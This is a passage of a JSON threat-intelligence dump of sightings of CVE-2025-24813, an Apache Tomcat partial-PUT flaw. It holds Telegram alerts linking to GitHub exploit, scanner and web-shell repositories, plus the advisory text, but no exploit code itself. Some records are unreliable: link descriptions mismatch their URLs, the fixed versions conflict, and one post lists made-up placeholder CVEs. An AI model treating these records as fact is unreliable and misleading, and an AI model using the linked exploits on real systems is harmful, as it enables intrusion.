"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/31102", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813 poc\nURL\uff1ahttps://github.com/Franconyu/Poc_for_CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-11T12:37:22.000000Z"}, {"uuid": "e994a746-9659-46c8-a0aa-2787512ae078", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7027", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24813\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.\n\nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:\n-\u00a0writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads\n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded\n-\u00a0the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to       perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n-\u00a0support for partial PUT (enabled by default)\n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location\n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.\n\ud83d\udccf Published: 2025-03-10T16:44:03.715Z\n\ud83d\udccf Modified: 2025-03-10T16:44:03.715Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq", "creation_timestamp": "2025-03-10T17:38:26.000000Z"}, {"uuid": "1caa71a7-e867-45e6-8c5a-825d7c73159d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9834", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24813\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.\n\nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:\n-\u00a0writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads\n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded\n-\u00a0the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to       perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n-\u00a0support for partial PUT (enabled by default)\n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location\n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.\n\ud83d\udccf Published: 2025-03-10T16:44:03.715Z\n\ud83d\udccf Modified: 2025-04-01T03:55:21.139Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq", "creation_timestamp": "2025-04-01T04:32:06.000000Z"}, {"uuid": "5eadf18e-dc7d-423e-b98f-2190d6a772f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18602", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6279\u91cf\u68c0\u6d4b\u811a\u672c(CVE-2025-24813)\nURL\uff1ahttps://github.com/iSee857/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-13T10:08:45.000000Z"}, {"uuid": "c53531ed-e144-4507-b07d-dd0ade5305cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18785", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813\u6f0f\u6d1e\u9a8c\u8bc1\nURL\uff1ahttps://github.com/FY036/cve-2025-24813_poc\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-14T07:42:01.000000Z"}, {"uuid": "5d91d0fb-c86a-4540-be23-ac1784ee1629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18784", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomatic thesauri backups from RCE PoolParty\nURL\uff1ahttps://github.com/absholi7ly/POC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-14T07:37:50.000000Z"}, {"uuid": "8980aea5-abc3-4af7-bd07-d743b9cc1ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19973", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aNuclei Template CVE-2025\u201324813\nURL\uff1ahttps://github.com/imbas007/CVE-2025-24813-apache-tomcat\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-17T22:46:58.000000Z"}, {"uuid": "72710684-38d8-4928-ac31-4c4fa39ed164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/30175", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a CVE-2025-24813-POC JSP Web Shell Uploader\nURL\uff1ahttps://github.com/La3B0z/CVE-2025-24813-POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-06T19:38:35.000000Z"}, {"uuid": "1a504222-ee02-4290-bdd4-d40bf12e53d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/30441", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aHello researchers, I have a checker for the recent vulnerability  CVE-2025-24813-checker.\nURL\uff1ahttps://github.com/horsehacks/CVE-2025-24813-checker\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-07T22:45:30.000000Z"}, {"uuid": "b07469cd-6771-4dd9-8350-32db88fc0d9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22697", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA PoC for CVE-2025-24813\nURL\uff1ahttps://github.com/tonyarris/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-23T07:11:48.000000Z"}, {"uuid": "b9c354ad-77ff-4222-afff-e7c537acfd23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/22191", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813 Apache Tomcat RCE PoC Proof of Concept (PoC)\nURL\uff1ahttps://github.com/Alaatk/CVE-2025-24813-POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-21T18:43:26.000000Z"}, {"uuid": "daf4db7e-5783-400e-95c5-7baeb7d9e0e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/45719", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1a Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit &amp; PoC\nURL\uff1ahttps://github.com/Shivshantp/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-07-28T19:27:49.000000Z"}, {"uuid": "9e8082af-2fb4-4b0b-9ca9-5a8544002d97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18747", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813_POC\nURL\uff1ahttps://github.com/N0c1or/CVE-2025-24813_POC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-14T03:15:14.000000Z"}, {"uuid": "9a3a6ae3-b94c-4bb1-8586-63d91d878466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/32683", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24813\u7684vulhub\u73af\u5883\u7684POC\u811a\u672c\nURL\uff1ahttps://github.com/Erosion2020/CVE-2025-24813-vulhub\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-18T11:06:37.000000Z"}, {"uuid": "b16cf5d4-0f91-4a08-9f06-df393e2a3d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43737", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExplore the CVE-2025-5777 vulnerability in Citrix NetScaler. This script highlights a memory leak issue for educational purposes. \ud83d\udc31\ud83d\udcbb\ud83d\udd0d\nURL\uff1ahttps://github.com/sentilaso1/CVE-2025-24813-Apache-Tomcat-RCE-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-12T02:44:44.000000Z"}, {"uuid": "3c65640f-9e9f-4c99-8a2e-88078aca1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/19966", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aNuclei Template CVE-2025\u201324813\nURL\uff1ahttps://github.com/imbas007/CVE-2025-24813.yaml\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-17T22:42:44.000000Z"}, {"uuid": "a0ccc3ee-c4a0-47a6-85ae-b62bf6cc682c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20211", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Remote Code Execution (RCE) Exploit - CVE-2025-24813\nURL\uff1ahttps://github.com/msadeghkarimi/CVE-2025-24813-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-18T08:43:24.000000Z"}, {"uuid": "07141fd8-2994-4b9b-a0ca-78422f034471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/23961", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA playground to test the RCE exploit for tomcat CVE-2025-24813\nURL\uff1ahttps://github.com/u238/Tomcat-CVE_2025_24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-24T18:51:07.000000Z"}, {"uuid": "66974154-1c55-41ea-a2a0-507bd4211943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20930", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Vulnerability POC (CVE-2025-24813)\nURL\uff1ahttps://github.com/michael-david-fry/Apache-Tomcat-Vulnerability-POC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-19T14:51:45.000000Z"}, {"uuid": "c66bb382-6cdd-45d4-a94b-8ae3554e9197", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/20923", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat Vulnerability POC (CVE-2025-24813)\nURL\uff1ahttps://github.com/michael-david-fry/Apache-Tomcat-Vulnerability-POC-CVE-2025-24813-\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-19T14:39:08.000000Z"}, {"uuid": "3f15ec16-6024-4fd5-9825-e00f59f8ecc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/21709", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPOC for CVE-2025-24813 using Spring-Boot\nURL\uff1ahttps://github.com/n0n-zer0/Spring-Boot-Tomcat-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-03-20T22:56:15.000000Z"}, {"uuid": "8b47aa89-020c-4c3c-b35d-891fb1b07001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/44593", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aA tool that identifies writable web directories in Apache Tomcat via HTTP PUT method [CVE-2025-24813]\nURL\uff1ahttps://github.com/x00byte/PutScanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-19T14:45:04.000000Z"}, {"uuid": "81a45c86-4460-4837-8596-92351aa14cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/28884", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis repository contains a shell script based POC on Apache Tomcat CVE-2025-24813.  It allow you to easily test the vulnerability on any version of Apache Tomcat\nURL\uff1ahttps://github.com/manjula-aw/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-02T06:30:19.000000Z"}, {"uuid": "8d75d4cd-01f9-4407-98a2-f7cfcbfd2e33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/29853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1asimple exp for CVE-2025-24813\nURL\uff1ahttps://github.com/AsaL1n/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-05T09:12:06.000000Z"}, {"uuid": "03f5e9de-3701-41e5-9a48-dc8ef880f926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/38081", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aApache Tomcat - Remote Code Execution via Session Deserialization (CVE-2025-24813)\nURL\uff1ahttps://github.com/mbanyamer/Apache-Tomcat---Remote-Code-Execution-via-Session-Deserialization-CVE-2025-24813-\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-25T13:39:39.000000Z"}, {"uuid": "98dd3087-bc16-4e10-8ae1-b1ff5d3a29b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/36879", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPoC para o CVE-2025-24813\nURL\uff1ahttps://github.com/maliqto/PoC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-05-15T12:29:59.000000Z"}, {"uuid": "6f2f943b-dac8-46b6-829b-fa8a60673e5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/47376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aPoC-CVE-2025-24813\nURL\uff1ahttps://github.com/137f/PoC-CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-11T19:22:31.000000Z"}, {"uuid": "3ca969ad-29aa-49b3-8c45-edeb78f6fa71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51603", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/brs6412/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T20:35:14.000000Z"}, {"uuid": "c66a4306-3902-4f13-8920-4437de20e94c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51623", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/Walekmw/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T23:30:29.000000Z"}, {"uuid": "504aad28-9a31-440a-9d0b-9ce72416c298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/46753", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAutomated scanner + exploit for CVE-2025-24813\nURL\uff1ahttps://github.com/cyglegit/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-06T07:20:06.000000Z"}, {"uuid": "02970bb9-f8d6-4ab8-ba1c-05ecef954b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50764", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aThis repository contains POC scenarios as part of CVE-2025-0411 MotW bypass.\nURL\uff1ahttps://github.com/Makavellik/POC-CVE-2025-24813-Apache-Tomcat-Remote-Code-Execution\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-08T18:38:43.000000Z"}, {"uuid": "fddd8f58-50df-40c0-bade-fa54f01e95a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51604", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/brs6412/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T20:36:50.000000Z"}, {"uuid": "6133f7d2-e83a-4d3a-be14-d475ec00de87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/oDgC7SboV_stqJmy_TZpePOrg5cgzErAhZJaKGoE5sYOBA4", "content": "", "creation_timestamp": "2025-09-08T21:00:05.000000Z"}, {"uuid": "69d03f5f-3ca8-4f0c-bb70-4ac0b825a342", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/NinjaSec/299", "content": "Code execution, and bypass vulnerabilities \u2014 for educational purposes only:\n\n\n1. CVE-2025-47241 \u2013 Whitelist bypass in Browser Use tool (CVSS 9.3)\n2. CVE-2025-25014 \u2013 Prototype pollution in Kibana (CVSS 9.1)\n3. CVE-2025-29927 \u2013 Next.js middleware authorization bypass (CVSS 9.1)\n4. CVE-2025-24813 \u2013 Apache Tomcat path traversal RCE (Critical)\n5. CVE-2025-2783 \u2013 Chrome Mojo use-after-free (High)\n6. CVE-2025-2636 \u2013 WordPress InstaWP plugin LFI (High)\n7. CVE-2025-2505 \u2013 WordPress Age Gate plugin LFI (High)\n8. CVE-2025-2746 \u2013 Kentico CMS auth bypass (CVSS 9.8)\n9. CVE-2025-2747 \u2013 Kentico CMS staging sync auth bypass (CVSS 9.8)\n10. CVE-2025-3066 \u2013 Chrome Site Isolation use-after-free (High)\n11. CVE-2025-46728 \u2013 cpp-httplib DoS vulnerability\n12. CVE-2025-12345 \u2013 Buffer overflow in XYZ app (CVSS 9.0)\n13. CVE-2025-12346 \u2013 SQL injection in ABC web app (CVSS 8.5)\n14. CVE-2025-12347 \u2013 XSS in DEF platform (CVSS 7.8)\n15. CVE-2025-12348 \u2013 Auth bypass in GHI system (CVSS 9.2)\n16. CVE-2025-12349 \u2013 RCE in JKL service via crafted packets (CVSS 9.5)\n17. CVE-2025-12350 \u2013 Privilege escalation in MNO app (CVSS 8.7)\n18. CVE-2025-12351 \u2013 Info disclosure in PQR system (CVSS 7.5)\n19. CVE-2025-12352 \u2013 DoS in STU server (CVSS 6.8)\n20. CVE-2025-12353 \u2013 Directory traversal in VWX app (CVSS 8.0)\n21. CVE-2025-12354 \u2013 Command injection in YZA tool (CVSS 9.1)\n22. CVE-2025-12355 \u2013 Insecure deserialization in BCD lib (CVSS 9.3)\n23. CVE-2025-12356 \u2013 CSRF in EFG portal (CVSS 7.2)\n24. CVE-2025-12357 \u2013 Memory corruption in HIJ driver (CVSS 8.9)\n25. CVE-2025-12358 \u2013 Improper auth in KLM API (CVSS 9.0)\n\n#HackersFactory", "creation_timestamp": "2025-05-07T15:48:27.000000Z"}, {"uuid": "93166b41-8c5e-48d2-a566-7d79c32d771b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/51614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 